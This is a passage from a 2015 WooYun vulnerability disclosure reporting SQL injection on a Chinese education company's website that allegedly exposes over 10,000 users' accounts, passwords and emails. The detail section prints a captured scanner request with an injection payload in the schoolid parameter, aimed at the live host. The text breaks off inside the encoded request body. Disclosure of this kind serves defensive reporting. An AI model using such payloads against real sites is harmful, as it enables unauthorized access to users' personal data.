当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105304

漏洞标题:昂立教育官网多处SQL注射导致1W+用户信息外漏(账户,密码,邮箱)

相关厂商:新课程教育在线

漏洞作者: 千斤拨四两

提交时间:2015-04-03 10:11

修复时间:2015-05-18 10:12

公开时间:2015-05-18 10:12

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

多个文件存在注射点,get注射以及post。

详细说明:

http://www.newclasses.org/2013ZYT/school_detail.aspx?schoolid=1


截取的数据包。

POST /2013ZYT/school_detail.aspx?schoolid=-1%27%20or%2035%20%3d%20%2733 HTTP/1.1
Content-Length: 24657
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: ASP.NET_SessionId=hur5d355kwqyd33m02sdwojk; urlReferer_in=http%3a%2f%2fwww.newclasses.org%2fdefault.aspx; subid=2; newcalsses_course_car=%255b%257b%2522CourseContent%2522%253anull%252c%2522CourseId%2522%253a0%252c%2522CourseImgUrl%2522%253anull%252c%2522CourseName%2522%253anull%252c%2522CourseTypeAvtiveName%2522%253anull%252c%2522CourseWareActiveType%2522%253a0%252c%2522CourseWareContent%2522%253anull%252c%2522CourseWareId%2522%253a7%252c%2522CourseWareTitle%2522%253a%25222013%25e5%25b1%258a%25e4%25b8%25ad%25e8%2580%2583%25e5%2590%258d%25e5%25b8%2588%25e9%259d%25a2%25e6%258e%2588%25e5%2586%25b2%25e5%2588%25ba%25e7%258f%25ad%2522%252c%2522GradeName%2522%253anull%252c%2522GradeType%2522%253a0%252c%2522SubjectName%2522%253anull%252c%2522SubjectType%2522%253a0%252c%2522TeacherTitle%2522%253anull%252c%2522Teachers%2522%253anull%252c%2522YearType%2522%253a0%252c%2522courseNum%2522%253a0%257d%252c%257b%2522CourseContent%2522%253anull%252c%2522CourseId%2522%253a0%252c%2522CourseImgUrl%2522%253anull%252c%2522CourseName%2522%253anull%252c%2522CourseTypeAvtiveName%2522%253anull%252c%2522CourseWareActiveType%2522%253a0%252c%2522CourseWareContent%2522%253anull%252c%2522CourseWareId%2522%253a5%252c%2522CourseWareTitle%2522%253a%25222013%25e5%25b1%258a%25e9%25ab%2598%25e8%2580%2583%25e5%2590%258d%25e5%25b8%2588%25e9%259d%25a2%25e6%258e%2588%25e5%2586%25b2%25e5%2588%25ba%25e7%258f%25ad%2b%2522%252c%2522GradeName%2522%253anull%252c%2522GradeType%2522%253a0%252c%2522SubjectName%2522%253anull%252c%2522SubjectType%2522%253a0%252c%2522TeacherTitle%2522%253anull%252c%2522Teachers%2522%253anull%252c%2522YearType%2522%253a0%252c%2522courseNum%2522%253a0%257d%252c%257b%2522CourseContent%2522%253anull%252c%2522CourseId%2522%253a0%252c%2522CourseImgUrl%2522%253anull%252c%2522CourseName%2522%253anull%252c%2522CourseTypeAvtiveName%2522%253a%2522%25e9%25ab%2598%25e8%2580%2583%2522%252c%2522CourseWareActiveType%2522%253a0%252c%2522CourseWareContent%2522%253anull%252c%2522CourseWareId%2522%253a1473%252c%2522CourseWareTitle%2522%253a%2522%25e5%258c%2596%25e5%25ad%25a6%2522%252c%2522GradeName%2522%253a%2522%25e9%25ab%2598%25e4%25b8%2589%2522%252c%2522GradeType%2522%253a0%252c%2522SubjectName%2522%253a%2522%25e5%258c%2596%25e5%25ad%25a6%2522%252c%2522SubjectType%2522%253a0%252c%2522TeacherTitle%2522%253anull%252c%2522Teachers%2522%253anull%252c%2522YearType%2522%253a0%252c%2522courseNum%2522%253a0%257d%255d; success=Start; JZID=7; regType=54; cookiev=question; timu1=; timu2=; timu3=; timu4=; timu5=; timu6=; timu7=; timu8=; timu9=; timu10=; timu11=; timu12=; timu13=; timu14=; timu15=; timu16=; timu17=; timu18=; timu19=; timu20=; timu21=; timu22=; timu23=; bookname=1
Host: www.newclasses.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
ctl00%24ibtLogin=&ctl00%24txtUserId=%e8%be%93%e5%85%a5%e8%b4%a6%e5%8f%b7...&ctl00%24txtUserPwd=psvpfeav&__EVENTVALIDATION=%2fwEWBAL4xtTZCgKinMSXCALXn93dAQK0w43UCKCqP02ujibEif2h%2fdEqh2l6c2td&__VIEWSTATE=%2fwEPDwUKMjEzMDk5OTgxNw9kFgJmD2QWAgIDD2QWAgIDD2QWBgIBDzwrAAoBAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgZmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAmYPZBYCZg8VBgzlpI3ml6blpKflraYSPHNwYW4%2bwrcyMTE8L3NwYW4%2bEjxzcGFuPsK3OTg1PC9zcGFuPgMxMzFGaHR0cDovL3d3dy5uZXdjbGFzc2VzLm9yZy8yMDEzenl0L3VwbG9hZC8yMDEwMDFcNjMzOTkwMDI5MjQ3OTY4NzUwLmpwZ%2bWBATxwPuWkjeaXpuWkp%2bWtpuWIm%2bW7uuS6jjE5MDXlubTvvIzljp%2flkI3lpI3ml6blhazlrabjgIImbGRxdW875aSN5pemJnJkcXVvO%2bS6jOWtl%2beUseWIm%2bWni%2bS6uuOAgeS4reWbvei%2fkeS7o%2befpeWQjeaVmeiCsuWutumprOebuOS8r%2bWFiOeUn%2bmAieWumu%2b8jOmAieiHquOAiuWwmuS5puWkp%2bS8oD%2fomZ7lpI%2fkvKDjgIvkuK0mbGRxdW875pel5pyI5YWJ5Y2O77yM5pem5aSN5pem5YWuJnJkcXVvO%2beahOWQjeWPpe%2b8jOaEj%2bWcqOiHquW8uuS4jeaBr%2b%2b8jOWvhOaJmOW9k%2baXtuS4reWbveefpeivhuWIhuWtkOiHquS4u%2bWKnuWtpuOAgeaVmeiCsuW8uuWbveeahOW4jOacm%2bOAgjwvcD4NCjxwPuWkjeaXpuWkp%2bWtpue7j%2bWOhui%2fkeeZvuW5tOeahOayv%2bmdqeOAgjE5MTflubTlpI3ml6blhazlrabmlLnlkI3kuLrnp4Hnq4vlpI3ml6blpKflrabvvIzkuIvorr7mlofjgIHnkIbjgIHllYbkuInnp5Hku6Xlj4rpooTnp5HlkozkuK3lrabpg6jjgIIxOTM35bm05oqX5pel5oiY5LqJ54iG5Y%2bR5ZCO77yM5a2m5qCh5YaF6L%2bB6YeN5bqG5YyX56Ka77yM5bm25LqOMTk0MeW5tOaUueS4uiZsZHF1bzvlm73nq4smcmRxdW8744CCMTk0NuW5tOWtpuagoei%2fgeWbnuS4iua1t%2baxn%2ba5vuWOn%2bWdgOOAguWIsDE5NDnlubTlrabmoKHlt7Lorr7nq4vmlofjgIHnkIbjgIHms5XjgIHllYbjgIHlhpzkupTpmaIyMOWkmuS4quezu%2b%2b8iOenke%2b8ieOAgumygei%2fheOAgemDreayq%2biLpeOAgemCuemfrOWli%2bOAgeiAgeiIjeOAgeeruuWPr%2bahouOAgemprOWvheWIneetieiRl%2bWQjeWtpuiAheabvuWIsOagoea8lOiusuaIluS7u%2baVmeOAgjE5NTDlubTpq5jmoKHliJ3mraXov5vooYzpmaLns7vosIPmlbTvvIzlpI3ml6blpKflrabnmoTmtbfmtIvns7vlubblhaXlsbHkuJzlpKflrabvvJvkuIrmtbfmmqjljZflpKflrabnmoTmlofjgIHms5XjgIHllYbkuInpmaLvvIzlkIzmtY7lpKflrabnmoTmlofjgIHms5XkuKTpmaLvvIzku6Xlj4rmtZnmsZ%2flpKflrabjgIHoi7Hlo6vlpKflrabnmoTpg6jliIbns7vnp5HlubblhaXlpI3ml6blpKflrabjgIIxOTUy5bm056eL5YWo5Zu96auY5qCh6Zmi57O76LCD5pW077yM5aSN5pem5aSn5a2m55qE5rOV5a2m6Zmi44CB5ZWG5a2m6Zmi44CB5Yac5a2m6Zmi6LCD5Ye677yM5YiG5Yir5oiQ56uL5LqG5Y2O5Lic5pS%2f5rOV5a2m6Zmi44CB5LiK5rW36LSi57uP5a2m6Zmi5ZKM5rKI6Ziz5Yac5a2m6Zmi77yb6ICM5Y2O5Lic5Zyw5Yy655qE5rWZ5rGf5aSn5a2m44CB5Lqk6YCa5aSn5a2m44CB5Y2X5Lqs5aSn5a2m44CB5a6J5b695aSn5a2m44CB6YeR6Zm15aSn5a2m44CB5Zyj57qm57%2bw5aSn5a2m44CB5rKq5rGf5aSn5a2m44CB6ZyH5pem5aSn5a2m44CB5aSn5ZCM5aSn5a2m44CB5YWJ5Y2O5aSn5a2m44CB5aSn5aSP5aSn5a2m44CB5LiK5rW35a2m6Zmi44CB5Lit5Y2O5bel5ZWG5LiT56eR5a2m5qCh44CB5Lit5Zu95paw6Ze75LiT56eR5a2m5qCh562J6auY562J6Zmi5qCh55qE5paH44CB55CG56eR5pyJ5YWz57O756eR5bm25YWl5aSN5pem5aSn5a2m44CC5LqM5Y2B5LiW57qqODDlubTku6Pku6XlkI7vvIzlsKTlhbbmmK%2fpgJrov4flm73lrrbmlZnogrLpg6jlkozkuIrmtbfluILlhbHlkIzlu7rorr7vvIzku6Xlj4ombGRxdW875LiD5LqUJnJkcXVvO%2bOAgSZsZHF1bzvlhavkupQmcmRxdW875ZKMJmxkcXVvO%2bS5neS6lCZyZHF1bzvnmoTph43ngrnlu7rorr7vvIzlpI3ml6blpKflrabpgJDmraXlj5HlsZXmiJDkuLrkuIDmiYDkurrmlofnp5HlrabjgIHnpL7kvJrnp5HlrabjgIHoh6rnhLbnp5HlrabjgIHmioDmnK%2fnp5Hlrabku6Xlj4rnrqHnkIbnp5HlrablnKjlhoXnmoTlpJrnp5HmgKfnoJTnqbblnovnu7zlkIjlpKflrabjgIIyMDAw5bm0NOaciDI35pel5LiK5rW35Yy756eR5aSn5a2m5LiO5aSN5pem5aSn5a2m5by65by65ZCI5bm277yM5oiQ56uL5paw55qE5aSN5pem5aSn5a2m44CC5aaC5LuK55qE5aSN5pem5aSn5a2m77yM5a2m56eR6Zeo57G75pu05Li66b2Q5YWo77yM57u85ZCI5a6e5Yqb5pu05Yqg5by65aSn44CCPC9wPg0KPHA%2b5aSN5pem5aSn5a2m546w5Lu75qCh6ZW%2f5Li65p2o546J6Imv5pWZ5o6I77yM5YWa5aeU5Lmm6K6w5Li65pyx5LmL5paH5pWZ5o6I44CCPC9wPg0KPHA%2b5aSN5pem5aSn5a2m5qCh6K6t77yaJmxkcXVvO%2bWNmuWtpuiAjOesg%2bW%2fl%2b%2b8jOWIh%2bmXruiAjOi%2fkeaAnSZyZHF1bzvvvJvmoKHpo47vvJombGRxdW875paH5piO44CB5YGl5bq344CB5Zui57uT44CB5aWL5Y%2bRJnJkcXVvO%2b%2b8jOWtpumjju%2b8miZsZHF1bzvliLvoi6bjgIHkuKXosKjjgIHmsYLlrp7jgIHliJvmlrAmcmRxdW8744CCPC9wPg0KPHA%2b5a2m5qCh546w5pyJ5ZOy5a2m5a2m6Zmi44CB5aSW5paH5a2m6Zmi44CB5paw6Ze75a2m6Zmi44CB5rOV5a2m6Zmi44CB57uP5rWO5a2m6Zmi44CB566h55CG5a2m6Zmi44CB5oqA5pyv56eR5a2m5LiO5bel56iL5a2m6Zmi44CB55Sf5ZG956eR5a2m5a2m6Zmi44CB5LiK5rW35Yy75a2m6Zmi44CB5YWs5YWx5Y2r55Sf5a2m6Zmi44CB6I2v5a2m6Zmi44CB5oqk55CG5a2m6Zmi44CB5L%2bh5oGv56eR5a2m5LiO5bel56iL5a2m6Zmi44CB5Zu96ZmF5YWz57O75LiO5YWs5YWx5LqL5Yqh5a2m6Zmi44CB56S%2b5Lya5Y%2bR5bGV5LiO5YWs5YWx5pS%2f562W5a2m6Zmi44CB5pWw5a2m56eR5a2m5a2m6Zmi5ZKM6L2v5Lu25a2m6Zmi562JMTfkuKrlhajml6XliLblrabpmaLvvIzlkKvmnIk2OeS4quezu%2b%2b8jDcz5Liq5pys56eR5LiT5Lia77yM5LiA57qn5a2m56eR5Y2a5aOr5a2m5L2N5o6I5p2D54K5MjLkuKrvvIzkuoznuqflrabnp5HljZrlo6vlrabkvY3mjojmnYPngrkxMzTkuKoo5YW25Lit6Ieq6K6%2bMjTkuKop77yM56GV5aOr5a2m5L2N5o6I5p2D54K5MjAx5LiqKOWFtuS4reiHquiuvjM45LiqKe%2b8jDbkuKrkuJPkuJrlrabkvY3mjojmnYPngrnvvIw35Liq5pWZ6IKy6YOo5paH56eR6YeN54K556eR56CU5Z%2b65Zyw77yMOeS4quWbveWutuWfuuehgOenkeWtpueglOeptuWSjOaVmeWtpuS6uuaJjeWfueWFu%2bWfuuWcsO%2b8jOW5tuiuvuaciTI15Liq5Y2a5aOr5ZCO56eR56CU5rWB5Yqo56uZ77yM5pyJNDDkuKrlrabnp5Hooqvlm73lrrbmlZnogrLpg6jmibnlh4bkuLrlm73lrrbph43ngrnlrabnp5HvvIzlsYXlhajlm73nrKzkuInkvY3jgII8L3A%2bDQo8cD7lm73lrrbph43ngrnlrabnp5HljIXmi6zvvJrpqazlhYvmgJ3kuLvkuYnlk7LlrabjgIHlpJblm73lk7LlrabjgIHmlL%2fmsrvnu4%2fmtY7lrabjgIHkuJbnlYznu4%2fmtY7jgIHph5Hono3lrabjgIHkuqfkuJrnu4%2fmtY7lrabjgIHmlL%2fmsrvlrabnkIborrrjgIHlm73pmYXlhbPns7vjgIHkuK3lm73lj6Tku6PmloflrabjgIHmsYnor63oqIDmloflrZflrabjgIHkvKDmkq3lrabjgIHljoblj7LlnLDnkIblrabjgIHln7rnoYDmlbDlrabjgIHlupTnlKjmlbDlrabjgIHov5DnrbnlrabkuI7mjqfliLborrrjgIHnkIborrrniannkIbjgIHlh53ogZrmgIHniannkIbjgIHlhYnlrabjgIHniannkIbljJblrabjgIHpq5jliIblrZDljJblrabkuI7niannkIbjgIHnlJ%2fmgIHlrabjgIHnpZ7nu4%2fnlJ%2fnianlrabjgIHpgZfkvKDlrabjgIHnlJ%2fnkIblrabjgIHnlLXot6%2fkuI7ns7vnu5%2fjgIHlvq7nlLXlrZDlrabkuI7lm7rkvZPnlLXlrZDlrabjgIHkurrkvZPop6PliZbkuI7nu4Tnu4fog5rog47lrabjgIHnl4Xljp%2fnlJ%2fnianlrabjgIHnl4XnkIblrabkuI7nl4XnkIbnlJ%2fnkIblrabjgIHlhoXnp5HlrabvvIjlv4PooYDnrqHnl4XjgIHogr7nl4XjgIHkvKDmn5Pnl4XvvInjgIHlhL%2fnp5HlrabjgIHnpZ7nu4%2fnl4XlrabjgIHlvbHlg4%2fljLvlrabkuI7moLjljLvlrabjgIHlpJbnp5HlrabvvIjmma7lpJbnp5HjgIHpqqjlpJbnp5HjgIHms4zlsL%2flpJbnp5HjgIHnpZ7nu4%2flpJbnp5HvvInjgIHnnLznp5HlrabjgIHogLPpvLvlkr3llonnp5HlrabjgIHogr%2fnmKTlrabjgIHkuK3opb%2fljLvnu5PlkIjln7rnoYDjgIHkuK3opb%2fljLvnu5PlkIjkuLTluorjgIHnpL7kvJrljLvlrabkuI7ljavnlJ%2fkuovkuJrnrqHnkIbjgII8L3A%2bDQo8cD7lrabmoKHnjrDmnInkuK3lm73or63oqIDmloflrabnoJTnqbbmiYDjgIHkuK3lm73npL7kvJrkuLvkuYnluILlnLrnu4%2fmtY7noJTnqbbkuK3lv4PjgIHnvo7lm73pl67popjnoJTnqbbkuK3lv4PjgIHljoblj7LlnLDnkIbnoJTnqbbmiYDjgIHkurrlj6PnoJTnqbbmiYDjgIHkuJbnlYznu4%2fmtY7noJTnqbbmiYDjgIHph5Hono3noJTnqbbpmaLjgIHmlbDlrabnoJTnqbbmiYDjgIHnjrDku6PniannkIbnoJTnqbbmiYDjgIHpgZfkvKDlrabnoJTnqbbmiYDjgIHkuIrmtbfluILlv4PooYDnrqHnl4XnoJTnqbbmiYDjgIHkuIrmtbfluILmlL7lsITljLvlrabnoJTnqbbmiYDjgIHogp3nmYznoJTnqbbmiYDnrYk3N%2bS4queglOeptuacuuaehO%2b8jDEyNuS4qui3qOWtpuenkeeglOeptuS4reW%2fg%2b%2b8jOacieWFiOi%2fm%2bWFieWtkOWtpuadkOaWmeS4juWZqOS7tuOAgeS4k%2beUqOmbhuaIkOeUtei3r%2bS4juezu%2be7n%2bOAgeW6lOeUqOihqOmdoueJqeeQhuOAgemBl%2bS8oOW3peeoi%2bOAgeWMu%2bWtpuelnue7j%2beUn%2beJqeWtpuetiTXkuKrlm73lrrbph43ngrnlrp7pqozlrqTjgII8L3A%2bDQo8cD7lrabmoKHnjrDmnInlkITnsbvlrabnlJ%2fov5E0NSwwMDDkvZnkurrvvIzlhbbkuK3mma7pgJrmnKzkuJPnp5HnlJ8xNjIwMOS9meS6uu%2b8jOehleWjq%2beUnzcwMDDkvZnkurrjgIHljZrlo6vnlJ8zLDEwMOS9meS6uu%2b8jOWkluWbveeVmeWtpueUnzEsNzYw5L2Z5Lq677yM5oiQ5Lq65pWZ6IKy5pys5LiT56eR55SfMTEwMDDkvZnkurrvvIznvZHnu5zmlZnogrLmnKzkuJPnp5HnlJ%2fov5E1ODAw5Lq644CCPC9wPg0KPHA%2b5a2m5qCh5oul5pyJ5LiA5pSv6auY5rC05bmz55qE5biI6LWE6Zif5LyN77yM546w5pyJ5LiT5Lu75pWZ5biI5LiO56eR56CU5Lq65ZGYMjQwMOS9meS6uu%2b8jOWFtuS4reaVmeaOiOOAgeWJr%2baVmeaOiDEzNTDkvZnkurrvvIzkuK3lm73np5HlrabpmaLjgIHkuK3lm73lt6XnqIvpmaLpmaLlo6syNOS6uu%2b8jOWNmuWjq%2beUn%2bWvvOW4iOi%2fkTY2MOS9meS6uu%2b8jOaVmeiCsumDqCZsZHF1bzvplb%2fmsZ%2flrabogIXlpZblirHorqHliJImcmRxdW8754m56IGY5pWZ5o6IMjbkurrjgIHorrLluqfmlZnmjogy5Lq677yM5aSN5pem5aSn5a2m5p2w5Ye65pWZ5o6IM%2bS6uuOAgeeJueiBmOaVmeaOiDEw5Lq677yMJmxkcXVvOzk3MyZyZHF1bzvpppbluK3np5HlrablrrY25Lq677yMJmxkcXVvO%2bWbveWutue6p%2bacieeqgeWHuui0oeeMruS4remdkuW5tOS4k%2bWutiZyZHF1bzsyNeS6uuOAgui%2fkeWHoOW5tOadpe%2b8jOWtpuagoeenr%2baegeW8lei%2fm%2bS6uuaJje%2b8jOWunuaWveaVmeiCsumDqCZsZHF1bzvplb%2fmsZ%2flrabogIXlpZblirHorqHliJImcmRxdW8777yM5raM546w5Ye65LiA5om55LyY56eA55qE5Lit6Z2S5bm05pWZ5biI77yM5LyY5YyW5LqG5biI6LWE6Zif5LyN57uT5p6E44CC5a2m5qCh6L%2bY5oul5pyJ5Lit5bGx44CB5Y2O5bGx562JOeS4qumZhOWxnuWMu%2bmZou%2b8jOmbhuWMu%2beWl%2bacjeWKoeOAgeS4tOW6iuaVmeWtpuS4juenkeeglOW3peS9nOS6juS4gOS9k%2bOAguWMu%2bmZouWMu%2beWl%2biuvuWkh%2bWFiOi%2fm%2bOAgeaKgOacr%2bWKm%2bmHj%2bmbhOWOmu%2b8jOaciTkwMOWkmuS6uuWFt%2bacieato%2bOAgeWJr%2bmrmOe6p%2biBjOensO%2b8jOS4uuS4tOW6iuaVmeWtpuWIm%2bmAoOS6huiJr%2bWlveeahOaVmeWtpuadoeS7tuOAgjwvcD4NCjxwPuWkjeaXpuWOhuWPsuS4iuabvue7j%2baLpeacieS4gOWkp%2baJueWtpuacr%2bWkp%2bW4iOWSjOiRl%2bWQjeWtpuiAhe%2b8jOWcqOWbveWGheWkluS6q%2bacieebm%2biqieOAguWRqOiwt%2bWfjuOAgemZiOacm%2bmBk%2bOAgeminOemj%2bW6huOAgeiLj%2batpemdkuOAgeiwreWFtumqp%2bOAgeWRqOS6iOWQjOOAgemZiOW7uuWKn%2bOAgeacseS4nOa2puOAgeiDoeabsuWbreOAgeS4peWMl%2ba6n%2bOAgeW8oOS4luemhOOAgeS8jeigoeeUq%2bOAgeWNoum5pOe7guOAgeiwouW4jOW%2bt%2betieiRl%2bWQjeWtpuiAhemVv%2bacn%2bWcqOagoeaJp%2baVme%2b8jOS4uuWkjeaXpuWloOWumuS6humbhOWOmueahOWtpuacr%2bS8oOe7n%2bWSjOWfuuehgOOAguiwiOWutuahouOAgeWQtOa1qemdkuOAgeiwt%2bi2heixquOAgeiDoeWSjOeUn%2bOAgeeOi%2bi%2fheOAgemZiOS4reS8n%2bOAgeadqOmbhOmHjOOAgeadqOemj%2bWutuOAgeaxpOmSiueMt%2bOAgemhvueOieS4nOOAgeadjuWkp%2ba9nOOAgemZiOeBj%2bePoOOAgeayiOiHquWwueOAgemXu%2beOieaiheOAgeeOi%2bWogeeQquOAgemZhuiwt%2bWtmeOAgeeroOWfueaBkuetieS4gOWkp%2baJueefpeWQjeS4k%2bWutu%2b8jOS7jea0u%2bi3g%2bWcqOWbveWGheWkluWtpuacr%2biInuWPsOS4iu%2b8jOaIkOS4uuWkjeaXpuW9k%2bS7o%2bWtpuacr%2beyvuelnueahOS7o%2bihqOOAguW7uuagoeS7peadpeWkjeaXpuWkp%2bWtpuWFseWfueWFu%2bS6hjE45LiH5L2Z5ZCN5ZCE57G75q%2bV5Lia55Sf77yM5raM546w5Ye65YyF5ous5LqO5Y%2bz5Lu744CB6YK15Yqb5a2Q44CB6ZmI5a%2bF5oGq44CB56u65Y%2bv5qGi44CB5byg5b%2bX6K6p44CB5p2O5bKa5riF562J5qCh5Y%2bL5Zyo5YaF55qE5LyX5aSa5p2w5Ye65Lq65omN77yM5Li65Zu95a6255qE5bu66K6%2b5LqL5Lia5L2c5Ye65LqG5Y2T6LaK6LSh54yu44CCPC9wPg0KPHA%2b5aSN5pem5aSn5a2m5oqK5Z%2b55YW75YW35pyJ5YWo6Z2i57Sg6LSo55qE6auY6LSo6YeP5Lq65omN5L2c5Li65pWZ5a2m55qE5qC55pys55uu5qCH44CC5a2m5qCh5LuO6Ieq5bex55qE5a6e6ZmF5Ye65Y%2bR77yM5aSn6IOG5ZC45pS25Zu95YaF5aSW6auY5qCh55qE5oiQ5Yqf57uP6aqM77yM5rOo6YeN5Yqg5by65a2m56eR6Ze055qE5riX6YCP44CB5Lqk5Y%2bJ44CB57uE5ZCI77yM5Y%2bR5oyl57u85ZCI5oCn5aSn5a2m5aSa5a2m56eR55qE54m56Imy5ZKM5LyY5Yq%2f77yM57uP6L%2bH6ZW%2f5pyf55qE5a6e6Le15ZKM5o6i57Si77yM5bey57uP5bu656uL6LW35LiA5aWX5q%2bU6L6D5a6M5pW055qE44CB5pyJ6Ieq6Lqr54m554K555qE5pWZ5a2m6K6h5YiS5ZKM566h55CG5L2T57O744CC5a2m56eR5bu66K6%2b5YWo6Z2i5ZCv5Yqo77yM5Y%2bR5bGV5Yq%2f5aS06Imv5aW944CCMjAwMuW5tO%2b8jOWFqOWbveaVmeWtpuaIkOaenOiOt%2bWlluaVsOWIl%2bWFqOWbveesrOS4ie%2b8jOWFqOWbveS8mOengOaVmeadkOivhOWlluWIl%2bWFqOWbveesrOS6jOOAgjwvcD4NCjxwPuWtpuagoeWcqCZsZHF1bzvpgJrmiY3mlZnogrLvvIzmjInnsbvmlZnlraYmcmRxdW8755qE5Y6f5YiZ5LiL77yM5oyJ54WnJmxkcXVvO%2bWOmuWfuuehgOOAgeWuveWPo%2bW%2bhOOAgemHjeiDveWKm%2bOAgeaxguWIm%2baWsCZyZHF1bzvnmoTmlZnlrabnkIblv7XvvIzlsIYmbGRxdW875pmu6YCa5pWZ5a2m44CB5Z%2b656GA5pWZ5a2m44CB5LiT5Lia5pWZ5a2mJnJkcXVvO%2bS4ieS4quaWuemdoueahOaVmeWtpuWGheWuue%2b8jOacieacuuWcsOe7k%2bWQiOi1t%2badpe%2b8jOazqOmHjeS4quaAp%2bWPkeWxle%2b8jOS9v%2bWtpueUn%2biOt%2bW%2bl%2bezu%2be7n%2beahOefpeivhuWSjOWunui3temUu%2beCvOeahOacuuS8muOAguWtpuagoeS7jjE5OTTlubTlrp7mlr3lrabliIbliLbmlZnlrabnrqHnkIbvvIzliqDlvLrlrabnlJ%2fnmoTnp5HnoJTorq3nu4PvvIzln7nlhbvlhbbliJvmlrDnsr7npZ7lkozliqjmiYvog73lipvjgILlkIzml7bliqDlvLror77nqIvlu7rorr7vvIzlpKflipvmj5DlgKEmbGRxdW875ZCN5pWZ5o6I5LiK5Z%2b656GA6K%2b%2b44CB5bim5Z%2b656GA5a6e6aqMJnJkcXVvO%2bOAgjIwMDHlubTlj4jliLborqLjgIrlhajpnaLmjqjov5vlrabliIbliLblu7rorr7nmoTlj6%2fooYzmgKfmlrnmoYjjgIvvvIzov5vkuIDmraXlrp7mlr3ku6XmlofnkIbmlZnogrLkuLrnibnngrnnmoTlrabliIbliLblu7rorr7nm67moIfvvIzmoJHnq4smbGRxdW875Lul5a2m55Sf5Li65Lit5b%2bDJnJkcXVvO%2beahOinguW%2fte%2b8jOWcqOiwg%2baVtOivvueoi%2biuvue9ruOAgeWOi%2be8qeWtpuWIhuOAgeW7uueri%2bWkmuenjeWtpuS9jeiuoeWIku%2b8jOW8gOaUvumAieaLqeS4k%2bS4muOAgeaOqOihjOWtpuacn%2bW8gOivvuWItu%2b8jOaMieWtpuWIhuaUtui0ueOAgeaVmeWtpui1hOa6kOaKleWFpe%2b8jOaLm%2baUtuWkluagoeaPkuePreeUn%2bS7peWPiuacrOagoeeUn%2bWPr%2bS7pei9rOS4k%2bS4muetieaWuemdoui%2fm%2bihjOaUuemdqe%2b8jOe7meWtpueUn%2bS7peabtOWkmueahOiHquS4u%2bmAieaLqeadg%2bOAgjwvcD4NCjxwPuWtpuagoeeahOeglOeptueUn%2baVmeiCsui0qOmHj%2bS5n%2bWcqOS4jeaWreaPkOmrmO%2b8jOWcqOWOhuW5tOWFqOWbveS8mOengOWNmuWjq%2bWtpuS9jeiuuuaWh%2bivhOmAieS4rSzntK%2forqHmnIkzMOevh%2biuuuaWh%2bWFpemAie%2b8jOWFpemAieaAu%2baVsOWxheWFqOWbveesrOS4ieOAgueglOeptueUn%2bWPkeihqOiuuuaWh%2baVsOS5n%2bacieWinumVv%2b%2b8jOWvueWtpuagoeenkeeglOi0oeeMrueOh%2bacieaJgOaPkOmrmOOAgjIwMDDlubTlhajmoKHnoJTnqbbnlJ%2flj5HooajorrrmlofmlbDljaDlrabmoKHmgLvmlbDnmoQzOS40JeOAguWcqDIwMDHlubTkuprmtLIxM%2baJgOiRl%2bWQjeWVhuWtpumZouWPguWKoOeahCZsZHF1bzvkuprmtLLliJvkuJrorqHliJLlpKfotZsmcmRxdW875LiK77yM5oiR5qChTUJB5Luj6KGo6Zif5ZuK5ous5YWo6YOo5Y2V6aG55LiO5oC75YiG5Yag5Yab77yM5Zyo5YWo5Zu9JmxkcXVvO%2bWNjuS4uuadryZyZHF1bzvnoJTnqbbnlJ%2fnlLXlrZDorr7orqHlpKfotZvkuK3vvIzmiJHmoKHlpJrmrKHojrflm6LkvZPlkozkuKrkurrlhqDlhpvjgII8L3A%2bDQo8cD7lrabmoKHlu7rnq4vkuobkuIDlpZfkuKXmoLzogIzmnInnibnoibLnmoTmlZnlrabnrqHnkIbliLbluqbvvIznoJTliLblkozlvIDlj5HkuoblhbfmnInlm73lhoXlhYjov5vmsLTlubPnmoTjgIrpq5jmoKHnvZHkuIrmlZnliqHnrqHnkIbns7vnu5%2fjgIvvvIzlrp7ooYzlr7zluIjliLbnrYnkuIDns7vliJfmjqrmlr3vvIzliLblrprkuobkuIDns7vliJfooYzkuYvmnInmlYjnmoTnrqHnkIbliLbluqbvvIzlhajpnaLlrp7njrDkuobnp5HlrabljJbjgIHkuJPkuJrljJbnrqHnkIbvvIzlubblnZrmjIHkuI3mh4jlnLDmlbTmsrvmlZnpo47lkozogIPpo47vvIzlvaLmiJDkuoboia%2flpb3nmoTlrabpo47lkozmoKHpo47jgII8L3A%2bDQo8cD7lrabmoKHph43op4bnrKzkuozor77loILnmoTmlZnogrLvvIzorr7nq4vkuoYmbGRxdW875a2m55Sf56eR5oqA5Yib5paw5Z%2b66YeRJnJkcXVvO%2b%2b8jCZsZHF1bzvlpKflrabnlJ%2fmmpHmnJ%2fnpL7kvJrlrp7ot7Xln7rph5EmcmRxdW8777yMJmxkcXVvO%2bWtpueUn%2beyvuWTgeekvuWbouW7uuiuvuWfuumHkSZyZHF1bzvkuInkuKrkuIDnmb7kuIfmlK%2fmjIHorqHliJLvvIzlvIDlip7nmb7lnLrnsr7lk4HorrLluqfvvIzlgKHlr7zor7vnmb7mnKzkuabvvIzlj4LliqDnmb7pobnnpL7kvJrlrp7ot7Xlkozlrp7pqozor77popjvvIzkvb%2fku6XlvrfogrLkuLrmoLjlv4PvvIzln7nlhbvliJvmlrDog73lipvlkozlrp7ot7Xog73lipvvvIzlvrfjgIHmmbrjgIHkvZPjgIHnvo7nm7jkupLmuJfpgI%2fnmoTntKDotKjmlZnogrLvvIzmiJDkuLrmoKHlm63nlJ%2fmtLvnmoTkuLvml4vlvovjgILlnKjlj43mmKDlrabnlJ%2fnp5HmioDliJvmlrDog73lipvnmoTlhajlm73lpKflrabnlJ8mbGRxdW875o